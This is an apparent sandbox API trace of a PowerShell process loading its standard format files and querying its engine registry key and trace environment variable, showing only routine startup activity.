	[0276.345] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d560 | out: lpFileInformation=0x16d560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0276.345] SetErrorMode (uMode=0x1) returned 0x1
	[0276.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0276.346] SetErrorMode (uMode=0x1) returned 0x1
	[0276.346] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d560 | out: lpFileInformation=0x16d560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0276.346] SetErrorMode (uMode=0x1) returned 0x1
	[0276.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0276.346] SetErrorMode (uMode=0x1) returned 0x1
	[0276.346] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d560 | out: lpFileInformation=0x16d560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0276.346] SetErrorMode (uMode=0x1) returned 0x1
	[0276.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0276.346] SetErrorMode (uMode=0x1) returned 0x1
	[0276.346] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d560 | out: lpFileInformation=0x16d560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0276.347] SetErrorMode (uMode=0x1) returned 0x1
	[0276.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0276.347] SetErrorMode (uMode=0x1) returned 0x1
	[0276.347] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d560 | out: lpFileInformation=0x16d560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0276.347] SetErrorMode (uMode=0x1) returned 0x1
	[0276.347] CoTaskMemAlloc (cb=0x104) returned 0x2ca2e0
	[0276.347] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0276.347] CoTaskMemFree (pv=0x2ca2e0) 
	[0276.350] CoTaskMemAlloc (cb=0x104) returned 0x2ca2e0
	[0276.350] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0276.350] CoTaskMemFree (pv=0x2ca2e0) 
	[0276.350] CoTaskMemAlloc (cb=0x104) returned 0x2ca2e0
	[0276.350] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0276.350] CoTaskMemFree (pv=0x2ca2e0) 
	[0276.351] CoTaskMemAlloc (cb=0x104) returned 0x2ca2e0
	[0276.351] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0276.351] CoTaskMemFree (pv=0x2ca2e0) 
	[0276.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0276.351] SetErrorMode (uMode=0x1) returned 0x1
	[0276.352] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1d0
	[0276.352] GetFileType (hFile=0x1d0) returned 0x1
	[0276.352] SetErrorMode (uMode=0x1) returned 0x1
	[0276.352] GetFileType (hFile=0x1d0) returned 0x1
	[0276.352] ReadFile (in: hFile=0x1d0, lpBuffer=0x333d278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x333d278*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0276.354] ReadFile (in: hFile=0x1d0, lpBuffer=0x333d278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x333d278*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0276.354] ReadFile (in: hFile=0x1d0, lpBuffer=0x333d278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x333d278*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0276.354] ReadFile (in: hFile=0x1d0, lpBuffer=0x333d278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x333d278*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0276.355] ReadFile (in: hFile=0x1d0, lpBuffer=0x333d278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x333d278*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0276.355] ReadFile (in: hFile=0x1d0, lpBuffer=0x333d278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x333d278*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0276.355] ReadFile (in: hFile=0x1d0, lpBuffer=0x333d278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x333d278*, lpNumberOfBytesRead=0x16d1f8*=0x9e2, lpOverlapped=0x0) returned 1
	[0276.355] ReadFile (in: hFile=0x1d0, lpBuffer=0x333c7c2, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x333c7c2*, lpNumberOfBytesRead=0x16d1f8*=0x0, lpOverlapped=0x0) returned 1
	[0276.355] ReadFile (in: hFile=0x1d0, lpBuffer=0x333d278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x333d278*, lpNumberOfBytesRead=0x16d1f8*=0x0, lpOverlapped=0x0) returned 1
	[0276.355] CloseHandle (hObject=0x1d0) returned 1
	[0276.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0276.356] SetErrorMode (uMode=0x1) returned 0x1
	[0276.356] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d1a0 | out: lpFileInformation=0x16d1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0276.356] SetErrorMode (uMode=0x1) returned 0x1
	[0276.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0276.356] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d288 | out: phkResult=0x16d288*=0x1d0) returned 0x0
	[0276.356] RegQueryValueExW (in: hKey=0x1d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d20c, lpData=0x0, lpcbData=0x16d208*=0x0 | out: lpType=0x16d20c*=0x1, lpData=0x0, lpcbData=0x16d208*=0x56) returned 0x0
	[0276.356] CoTaskMemAlloc (cb=0x5a) returned 0x2bbdf0
	[0276.356] RegQueryValueExW (in: hKey=0x1d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d1dc, lpData=0x2bbdf0, lpcbData=0x16d1d8*=0x56 | out: lpType=0x16d1dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d1d8*=0x56) returned 0x0
	[0276.356] CoTaskMemFree (pv=0x2bbdf0) 
	[0276.357] RegCloseKey (hKey=0x1d0) returned 0x0
	[0276.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0276.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0276.889] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xe85061b4, Data2=0xe2d0, Data3=0x4d17, Data4=([0]=0xb9, [1]=0xe4, [2]=0xeb, [3]=0x99, [4]=0xbc, [5]=0x85, [6]=0xb3, [7]=0xd6))) returned 0x0
	[0276.905] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xbb0e8c14, Data2=0xd5be, Data3=0x4a4d, Data4=([0]=0xb3, [1]=0xb, [2]=0xdc, [3]=0x16, [4]=0x22, [5]=0xb0, [6]=0x7c, [7]=0x65))) returned 0x0
	[0276.907] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0276.907] SetErrorMode (uMode=0x1) returned 0x1
	[0276.907] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1d0
	[0276.908] GetFileType (hFile=0x1d0) returned 0x1
	[0276.908] SetErrorMode (uMode=0x1) returned 0x1
	[0276.908] GetFileType (hFile=0x1d0) returned 0x1
	[0276.908] ReadFile (in: hFile=0x1d0, lpBuffer=0x3367de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3367de0*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0276.909] ReadFile (in: hFile=0x1d0, lpBuffer=0x3367de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3367de0*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0276.910] ReadFile (in: hFile=0x1d0, lpBuffer=0x3367de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3367de0*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0276.910] ReadFile (in: hFile=0x1d0, lpBuffer=0x3367de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3367de0*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0276.910] ReadFile (in: hFile=0x1d0, lpBuffer=0x3367de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3367de0*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0276.911] ReadFile (in: hFile=0x1d0, lpBuffer=0x3367de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3367de0*, lpNumberOfBytesRead=0x16d1f8*=0xfb2, lpOverlapped=0x0) returned 1
	[0276.911] ReadFile (in: hFile=0x1d0, lpBuffer=0x33674fa, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x33674fa*, lpNumberOfBytesRead=0x16d1f8*=0x0, lpOverlapped=0x0) returned 1
	[0276.911] ReadFile (in: hFile=0x1d0, lpBuffer=0x3367de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x3367de0*, lpNumberOfBytesRead=0x16d1f8*=0x0, lpOverlapped=0x0) returned 1
	[0276.911] CloseHandle (hObject=0x1d0) returned 1
	[0276.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0276.912] SetErrorMode (uMode=0x1) returned 0x1
	[0276.912] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d1a0 | out: lpFileInformation=0x16d1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0276.912] SetErrorMode (uMode=0x1) returned 0x1
	[0276.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0276.912] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d288 | out: phkResult=0x16d288*=0x1d0) returned 0x0
	[0276.912] RegQueryValueExW (in: hKey=0x1d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d20c, lpData=0x0, lpcbData=0x16d208*=0x0 | out: lpType=0x16d20c*=0x1, lpData=0x0, lpcbData=0x16d208*=0x56) returned 0x0
	[0276.912] CoTaskMemAlloc (cb=0x5a) returned 0x2bbdf0
	[0276.913] RegQueryValueExW (in: hKey=0x1d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d1dc, lpData=0x2bbdf0, lpcbData=0x16d1d8*=0x56 | out: lpType=0x16d1dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d1d8*=0x56) returned 0x0
	[0276.913] CoTaskMemFree (pv=0x2bbdf0) 
	[0276.913] RegCloseKey (hKey=0x1d0) returned 0x0
	[0276.913] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0276.913] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0276.915] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x3c2ffca1, Data2=0x59b6, Data3=0x4173, Data4=([0]=0xb6, [1]=0x99, [2]=0xe4, [3]=0x5c, [4]=0xab, [5]=0xc0, [6]=0xcb, [7]=0x42))) returned 0x0
	[0276.916] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x9b137c75, Data2=0xb604, Data3=0x434d, Data4=([0]=0xa1, [1]=0xa6, [2]=0xad, [3]=0x4e, [4]=0xb2, [5]=0x3a, [6]=0x2b, [7]=0xde))) returned 0x0
	[0276.917] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x541b08a4, Data2=0x28a6, Data3=0x4b5a, Data4=([0]=0xb0, [1]=0x57, [2]=0xe0, [3]=0x8a, [4]=0x3c, [5]=0xa4, [6]=0x80, [7]=0x7e))) returned 0x0
	[0276.917] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0xef705219, Data2=0x83b6, Data3=0x485f, Data4=([0]=0xb0, [1]=0xd1, [2]=0x27, [3]=0xed, [4]=0xc4, [5]=0x2a, [6]=0xef, [7]=0x20))) returned 0x0
	[0276.917] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x724c48b0, Data2=0xfad, Data3=0x4be1, Data4=([0]=0xad, [1]=0xf2, [2]=0x73, [3]=0xd5, [4]=0x35, [5]=0x7f, [6]=0xd4, [7]=0x73))) returned 0x0
	[0276.917] CoCreateGuid (in: pguid=0x16d4b0 | out: pguid=0x16d4b0*(Data1=0x2ba3e703, Data2=0xca35, Data3=0x4ee6, Data4=([0]=0xb3, [1]=0x54, [2]=0x8f, [3]=0x60, [4]=0x75, [5]=0x2e, [6]=0x7e, [7]=0xc9))) returned 0x0
	[0276.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0276.918] SetErrorMode (uMode=0x1) returned 0x1
	[0276.918] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1d0
	[0276.918] GetFileType (hFile=0x1d0) returned 0x1
	[0276.918] SetErrorMode (uMode=0x1) returned 0x1
	[0276.918] GetFileType (hFile=0x1d0) returned 0x1
	[0276.919] ReadFile (in: hFile=0x1d0, lpBuffer=0x33b3b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x33b3b40*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0276.920] ReadFile (in: hFile=0x1d0, lpBuffer=0x33b3b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x33b3b40*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0276.920] ReadFile (in: hFile=0x1d0, lpBuffer=0x33b3b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x33b3b40*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0276.921] ReadFile (in: hFile=0x1d0, lpBuffer=0x33b3b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x33b3b40*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0276.921] ReadFile (in: hFile=0x1d0, lpBuffer=0x33b3b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x33b3b40*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0276.921] ReadFile (in: hFile=0x1d0, lpBuffer=0x33b3b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x33b3b40*, lpNumberOfBytesRead=0x16d1f8*=0x1000, lpOverlapped=0x0) returned 1
	[0276.922] ReadFile (in: hFile=0x1d0, lpBuffer=0x33b3b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x33b3b40*, lpNumberOfBytesRead=0x16d1f8*=0xaca, lpOverlapped=0x0) returned 1
	[0276.922] ReadFile (in: hFile=0x1d0, lpBuffer=0x33b3172, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x33b3172*, lpNumberOfBytesRead=0x16d1f8*=0x0, lpOverlapped=0x0) returned 1
	[0276.922] ReadFile (in: hFile=0x1d0, lpBuffer=0x33b3b40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d1f8, lpOverlapped=0x0 | out: lpBuffer=0x33b3b40*, lpNumberOfBytesRead=0x16d1f8*=0x0, lpOverlapped=0x0) returned 1
	[0276.922] CloseHandle (hObject=0x1d0) returned 1
	[0276.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0276.922] SetErrorMode (uMode=0x1) returned 0x1
	[0276.923] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d1a0 | out: lpFileInformation=0x16d1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0276.923] SetErrorMode (uMode=0x1) returned 0x1
	[0276.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0276.923] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d288 | out: phkResult=0x16d288*=0x1d0) returned 0x0
	[0276.923] RegQueryValueExW (in: hKey=0x1d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d20c, lpData=0x0, lpcbData=0x16d208*=0x0 | out: lpType=0x16d20c*=0x1, lpData=0x0, lpcbData=0x16d208*=0x56) returned 0x0
	[0276.923] CoTaskMemAlloc (cb=0x5a) returned 0x2bbdf0
	[0276.923] RegQueryValueExW (in: hKey=0x1d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d1dc, lpData=0x2bbdf0, lpcbData=0x16d1d8*=0x56 | out: lpType=0x16d1dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d1d8*=0x56) returned 0x0
	[0276.923] CoTaskMemFree (pv=0x2bbdf0) 
	[0276.923] RegCloseKey (hKey=0x1d0) returned 0x0
